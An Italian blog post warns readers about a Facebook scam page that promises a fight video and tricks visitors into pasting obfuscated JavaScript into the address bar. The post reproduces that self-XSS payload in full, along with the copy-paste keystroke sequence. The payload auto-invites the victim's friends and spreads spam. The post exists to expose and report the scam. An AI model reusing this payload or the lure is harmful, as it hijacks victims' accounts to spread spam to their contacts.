Ieri mi è arrivata una mail di notifica da Facebook, di una persona che non conosco, la quale mi invitava a visualizzare un filmato su facebook. Recitava così:

Hey, watch the Nastiest Girl Fight Video Ever!

http://www.facebook.com/pages/The-Nastiest-Girl-Fight-Video-Ever/119569574748363

Il mandante però non era Facebook; ho deciso quindi di abboccare e vedere cosa sarebbe successo. La pagina linkata è effettivamente una pagina di Facebook, con un bel video, del genere per pervertiti sessuali che si divertono a vedere due donne che si tirano per i capelli (in questo caso un bel virus a certa gente, starebbe proprio bene!)
C’è un bel tastone che recita: Watch Video. Premuto il bottone, ovviamente il video non comincia, compare invece una serie di tasti da premere sulla tastiera, in questa sequenza

CTRL + C : in questo modo abbiamo copiato il codice Javascript nascosto nella finestrella che ci è comparsa subito dopo aver premuto Watch Video. Ecco qua sotto il codice:

javascript:(function()

{a='app110436432334612_jop';

b='app110436432334612_jode';

ifc='app110436432334612_ifc';

ifo='app110436432334612_ifo';

mw='app110436432334612_mwrapper';eval(function(p,a,c,k,e,r)

{e=function(c){return(c35?String.fromChar

Code(c+29):c.toString(36))};if(!''.replace(/^/,String))

{while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function()

{return'\\w+'};c=1};while(c--)if(k[c])p=p.rep

lace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}

('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\

h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\

j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q

\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\

v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\

p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]]

(V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)

[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]]

(e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);

C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]]

(c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|

x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|

x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|

x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|docu

ment|mw|fs|SocialGraph

Manager|ifo|ifc|||||||'.split('|'),0,{}))})();

ALT + D: con questi tasti, selezioniamo il campo della barra degli indirizzi del nostro browser; capiamo adesso il perché

CTRL + V: incolliamo nella barra degli indirizzi, selezionata in precedenza, il codice Javascript copiato con il primo comando

ENTER: eseguiamo il javascript

Subito dopo ci apparirà la lista dei nostri amici e automaticamente il codice di controllo che compare prima della condivisione di un contenuto. Ho chiuso la finestra per paura di inviare ai miei contatti delle porcherie; subito dopo mi si è aperto un sito su blogspot, che non linko nemmeno, apparentemente di spammer che vogliono solo un pò di pubblicità.
Ho già provveduto a segnalare la pagina e spero venga rimossa al più presto.
Se volete segnalarla anche voi, questo è il Link